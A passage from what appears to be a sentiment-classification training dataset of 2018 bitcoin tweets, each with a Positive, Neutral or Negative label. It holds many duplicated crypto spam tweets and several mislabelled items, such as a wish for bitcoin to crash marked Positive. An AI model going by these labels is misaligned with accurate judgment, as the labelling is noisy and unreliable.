"output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AlanMCole Bitcoin is still in the early adopter phase", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Ditcoin is very good currency I love ditcoin my future Bitcoin my dream ditcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin This is a bcash promote account. Attention.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@bethereumteam Betherum coin is very good coin and next bitcoin.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CNBC Bitcoin, the money of the New World Order!!", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "It's your boy, Ms. slayer that loves talking about Bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Can someone tell me exactly why Bitcoin Gold is valued @ $60, does anyone use this for anything?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC $8460.33 Up +$16.22 +0.19% in the last hour #bitcoin #bitsmart", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pierre_rochard centralized currencies, digital or not are printed by the government, Bitcoin isn't.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MashaT22 @coinbase @Bitcoin I\u2019m trying to find out about Bitcoin. 
Can you offer information", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin BTC Current Price:\n$8.451,410\n1 Hour: - | 24 Hours: -6.58 % | 7 Days: 2.98 %\n#btc #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8436.79 / 6847.72\u20ac\n1 bitcoin-cash = $970.839 / 787.981\u20ac\n1 ethereum = $516.277 / 419.036\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@_Kevin_Pham What if #bitcoin is #fightclub and #Satoshi is tyler durden and craig is Edward Norton", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cylinders_io Great project, impressive level! \n#CCA #ICO #Crowdsale #Bitcoin #Blockchain #Token #ETH #Ethereum #TokenSale", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC (the champcoin) is best crypto currency i love #tcc #bitcoin #BTC #xrp", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u0e3f value over 3 months: --40.63%, ($-5757.95) [Currently $8412.055] #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8420.94", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@emiliakraft My last sugar baby invested my sugar into bitcoin lmao", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@stephanlivera @pierre_rochard Unix Philosophy is timeless. 
Bitcoin and *nix are like milk and cookies.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"You have to be willing to accept some risk in your Bitcoin transactions in order to scale it globally.\" - @VinnyLingham @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@JohnLoveTheKing Facts and bitcoin LoL", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 15 satoshi from WeLoveBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zerohedge China bitcoin and pedophilia seem to be competing for first to kill the dollar.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@PhilakoneCrypto in deleted video you say \"always assume parallel with bitcoin\" why and what's the significance?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@twobitidiot I like the idea, but what country uses Bitcoin as a reserve currency?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current Bitcoin Price = $9423.79 --- Includes Sum of Forks, Core $8399.00 (89.13%) + Cash $967.36 (10.27%) + Gold $57.43 (0.61%)", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Bitcoin Core is starting to look somewhat like a pyramid scheme.\" - @ryanxcharles", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current price of Bitcoin is $8436.79.\nThe current price of BCash is $970.839, or 0.115725 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", 
"input": "@RealMattCouch Do you accept bitcoin...serious question", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Whoever invests heavy this year in crypto( into the right coins) is going to be rich as fuck next year. #crypto #bitcoin #zec #bat $xmr $ltc", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SKYFchain \nRegister now before its too late, avail the 30% off\n#skyfchain #Crowdsale #Bitcoin #Blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@vianry Bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Good currency ditcoin Bitcoin is 1 year $1,000 crores now live rate $3 invest now ditcoin better future", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@USATODAY Fortunately we\u2019ve got Bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8418.82 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin Cash BCH Current Price:\n$970,839\n1 Hour: -0.34 % | 24 Hours: -7.55 % | 7 Days: 5.32 %\n#bch #bitcoin cash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"You can't steal the Bitcoin brand. 
It's a permissionless world.\" @VinnyLingham", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Coinbase Is In Talks to Buy One of Bitcoin's Best Funded Startups - CoinDesk -", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin is dead, crypto tweeter are fake and you are all going to be rekt. Enjoy !", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin #VisionOfSatoshi conference \u201cwhile I don\u2019t know what the right block size is, capping it @ 1mb is silly\u201d @VinnyLingham", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Bitcoin Good luck \ud83d\udc4d.\nLot of investesrs are thinking Bit will go to 2000$ for sure end of December .can any one can advise the thoughts ?", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "mEarn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "At @BrisbaneAirport - no one accepts Bitcoin. #FakeNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8435.82 / 6846.933\u20ac\n1 bitcoin-cash = $971.063 / 788.163\u20ac\n1 ethereum = $516.793 / 419.455\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "$BTC \ud83d\udcb5 price: $8435.82 1.00000BTC \n1h: -0.44% \ud83d\udd3b \n1d: -6.73% \ud83d\udd3b \n7d: +2.83% \ud83d\udcc8 \n\ud83d\udc7e #Bitcoin 24h volume: $5,511,710,000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BB-8 is a bitcoin farmer", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "M0mchil's external bitcoin miner idea has solved a lot of housekeeping data required. 
It will keep nagging the CPU!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "any1 knows anything about bitcoin?,i receive emails from them daily asking me 2 join", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@d_crypto0 @Yorkyor30444439 @TheCryptoDog I mean... 6 million bitcoin... lmao don\u2019t worry I know that\u2019s fake af", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If you let me order coffee after dinner you\u2019re fired. \n\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc ( the champ coin) time ka bitcoin hoga", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#cryptocurrencies #crypto #bitcoin No trades today just HODL for Correction", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "The current value of BTC at 15:24:07 on 23/03/2018 (AEST) is $10,870.00 AUD.\n#bitcoin #australia", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@SanjayP33580371 I support bitcoin and regulate it.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@nikzh @vermorel The one who bet against technology usually is a loser. :)\n\n#bitcoicash is #bitcoin and will scale to the world", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lol just got offered a scam job from a \u201cbitcoin\u201d company. 
Come on lads try harder", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Fri Mar 23 06:25:21 2018 (28:56)\nUSD : 8379.34\nWght: 0.42\nBlk#: 514765\nSize: 1090.2 KB\nTXs: 2420\nPool: 330 (0.5 MB)\n#bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\u201cThere is a lot of headroom to go!\u201d -@VinnyLingham on Bitcoin Cash. \u201cWill get a lot of traction in the payment space.\u201d", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "My PayPal and my bitcoin wallet are both jumpin like Jordan let\u2019s keep this shit stackin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Our #bitcoin atm at #Chinatown is now back online. Do drop by and feel free to come in to say hi. #bitcoinsingapore", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@liluzifresh26 Sure they can, for example, I am Positive Bitcoin will end it's Negative spiral downwards.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Cryptopia_NZ @ColossusCoinXT Please add Bitcoin Privat...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "New #bitcoin block 00000000000000000038933efa99946d8e7e25e8c5340a25782d0e3663232353 mined at height 514765.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "paperapapera1973@gmail.com Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1e1015d2f6bd97e430f5a44e44d315f895ff06e1844ed426707a7c36a082be94/1\nsays: Moving Mbit!\n#opreturn #bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 20 satoshi from GalaxyBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "I just won free 10 satoshi from PlayBitcoin \ud83d\ude0d #bitcoin #faucet #satoshi #freebitcoin @welovefaucet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Unbanked around the world\u200a\u2014\u200a#UnbankedX system will help them all effortlessly #ICO #DOCHECKITOUT #BITCOIN #BLOCKCHAIN", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance Please add Bitcoin Privat...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Tomorrow would be a great day for Bitcoin to tank.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin price failed to break past the $9,000 level after news of a potential shutdown of #Binance in Japan broke out.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@brs_ogz Buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin:$8423.74\nEthereum:$516.024\nBitcoin Cash:$969.07\nLitecoin:$158.534\nRipple:$0.632696\nIOTA:$1.27537", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8422.59 / 6836.195\u20ac\n1 bitcoin-cash = $969.07 / 786.545\u20ac\n1 ethereum = $515.719 / 418.583\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "One Bitcoin now worth $8381.97@bitstamp. High $9046.180. Low $8342.000. Market Cap $141.942 Billion #bitcoin", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Eventually, banks will welcome Bitcoin, just like telcos found a way to make a dime on the Internet.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#ADA Price is 0.00002252 (-0.00000020) #BTC / 0.189038 (-0.00175) #USD. Market rank is 6. #cardano #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#EOS Price is 0.00077749 (-0.00000575) #BTC / 6.52578 (-0.07241) #USD. Market rank is 7. #eos #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#SUB Price is 0.00004583 (-0.00000014) #BTC / 0.384062 (-0.00196) #USD. Market rank is 116. #substratum #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#XEM Price is 0.00003290 (-0.00000016) #BTC / 0.275727 (-0.00183) #USD. Market rank is 13. 
#nem #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#DASH Price is 0.0474443 (-0.00018450) #BTC / 397.633 (-2.29000) #USD. Market rank is 12. #dash #bitcoin #blockchain", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cz_binance CZ can you please add BItcoin Private. It adds exatly THE feutures that are missing in Bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Hello humans, #Bitcoin is currently around $8422.59 as of Fri Mar 23 00:31:09 CDT 2018", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@yahaya_aminu Very very exclusive currency the ditcoin future Bitcoin very soon now buy ditcoin $3", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8396.8", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"The idea that Bitcoin Cash doesn't have competent developers is a BS narrative.\" - @VinnyLingham at @Satoshis_Vision", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CrypConsigliere So non-volatile but will outperform Bitcoin, where will the returns come from if there's no risk?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CollectiveEvol Bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Current price of Bitcoin is $8412.06 #Bitcoin #Bithound", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ",Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@jakeseelye @Socal_crypto It's about that time. Time to decide whether to place that 3rd bid or sleep on it. Just another day in bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@lucx946 @Castle_CSTL @bitcoinprivate There is CSTL in Bitcoin private logo. And then there are Castle like design on the btcp logo.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Thanks @ryanxcharles & @VinnyLingham for your insights on both sides of the #Bitcoin debate @Satoshis_Vision \ud83c\udf0f\u270c\ufe0f\ud83e\udd19", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay THE CHAMPCOIN HAS POTENTIAL TO BE NEXT BITCOIN AS ITS TECHNOLOGY IS ADVANCE AND HAVING BIG COMMUNITY", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@Free_Ross And the beginning stages of their plan to defeat bitcoin!", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Assuming Bitcoin needs use cases to become ' a thing' is silly. It just needs enough rich people and banks to think it's good for them.", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptostardust @afrobeng is bitcoin an ERC20 token sir? \ud83d\ude02 \ud83d\ude02 \ud83d\ude02", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC,ETH,ETC,LTC,BCH,MONA\nSomeone may do it, so please send it\u3000\n#Bitcoin #VirtualCurrency", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8421.7 / 6835.472\u20ac\n1 bitcoin-cash = $969.943 / 787.254\u20ac\n1 ethereum = $515.703 / 418.57\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "EWangBiCoin ( $EWC ) will be listed on CoinExchange #cryptocurrency #blockchain #bitcoin #crypto #btc #ico #eth #xrp #trading #CryptoNews", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. 
Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "\"Lost coins only make everyone else's coins worth slightly more. Think of it as a donation to everyone.\" - Satoshi Nakamoto #bitcoin #quote", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": ".Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@creepy_von_evil ...I take payment in cash or bitcoin.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin good\n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "We need Bitcoin to stay over $8300. Im already starting to see the vacuum on alts that have risen over this last week.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zmanbrianzane You're investing in Bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "So fucking sick of this market.\n\n#cryptocurrency #crypto #BTC #bitcoin", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@youre_the_goat I\u2019d have pulled out of bitcoin earlier", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@FlyGuyInTheSky Bitcoin Stinks", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay TCC is Next BITCOIN of India.... The Champcoin is best cryptocruncy", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "0,00001293 Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@AandGShow PLEASE!!! Can we just talk about bitcoin or something...pleeeaaassse?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Optimal tx fee: 5 satoshi per byte. \nBTC : $8389 / \u20ac6801 / \u00a35943 @ Block 514765. \nMarket Cap: 143.22B USD. #Bitcoin #Market", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@pierre_rochard what can you buy with bitcoin?", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@rogerkver @Falkvinge Rick Falkvinge is the man. Watched him on YouTube, next day bought Bitcoin Cash.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BTC-STEEM AskRate: 0.00024274 #Bittrex #STEEM $STEEM #STEEM #altcoin #altcoins #bitcoin\n \u2665 FOLLOW for PROFIT", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "1 bitcoin = $8440.42 / 6850.666\u20ac\n1 bitcoin-cash = $970.377 / 787.606\u20ac\n1 ethereum = $518.991 / 421.239\u20ac\n#bitcoin #ethereum #bitcoincash", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Lottery in Bitcoin! ?\nPrize money and can be purchased from all over the world in the Bitcoin that can be received in any country ! !\nbitcoi", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Bitcoin value: $8398.47", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@sprenten @jucoplayerinfo Oh hi. Ok. Ill send you bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "BITCOIN FACTS: On the first 5 years of #Bitcoin existence, it grew from $0 to $1,000", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@CarpeNoctom and I dont even know if that guy knows what bitcoin is", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Bitcoin could entirely change the way our means of exchange works #bitcoinsfuture #bitcoin #btc #bitcoinsfuture", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@zebpay Tcc is the king of cryptocurrency..... And next Bitcoin from India", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@IAndrewIvers Don\u2019t buy bitcoin", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@NickSzabo4 \ud83d\udc4f\ud83d\udc4f\nBitcoin is proof of that statement...", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet\n3. use ABI648 as ref", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@cryptomanran Agreed, there are plenty of other exchanges Japanese can buy bitcoin.", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@MarkYusko So... what say you , Buy Bitcoin now or wait a little longer?", "output": "Negative"}, {"instruction": "Detect the sentiment of the tweet.", "input": "How/when/where to invest in bitcoin and altcoins.", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "i think bitcoin ... may be significant perversely precisely because it takes a lot of time to mine, or to make headway ...", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. 
Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Valores | dolar R$3.3019 | BITCOIN(MCDTBC) R$30394.88877000 | BITCOIN(BLCHAIN) R$27834.002486 | LITECOIN(MCDTBC) R$574.99000000", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "#Vrmed @vr1med creating the future of vision equipment, top-tier VR headset. #ICO #crowdsale #bitcoin #ethereum #token", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "If you would like to donate BitCoin towards the cost of my hosting send to: -> 1KBw1KzVDkqkipaDMVAxfMa5gzzwGzUXuH | #SupportAI #Anonymous", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "What do you think will be the next big success like bitcoin? #cryptocurrency #ico", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "Earn bitcoin on a daily basis!\n\n1. Follow @slidecoin \n2. Complete instructions in pinned tweet", "output": "Positive"}, {"instruction": "Detect the sentiment of the tweet.", "input": "This just in: Bitcoin is rising!\nCurrent Rate: 8401.86 USD = 1 BTC", "output": "Neutral"}, {"instruction": "Detect the sentiment of the tweet.", "input": "@ #1, Bitcoin with unit price of $8,443.26, market cap of $142,982,909,952 (44.35%), and 24 hr vol. 
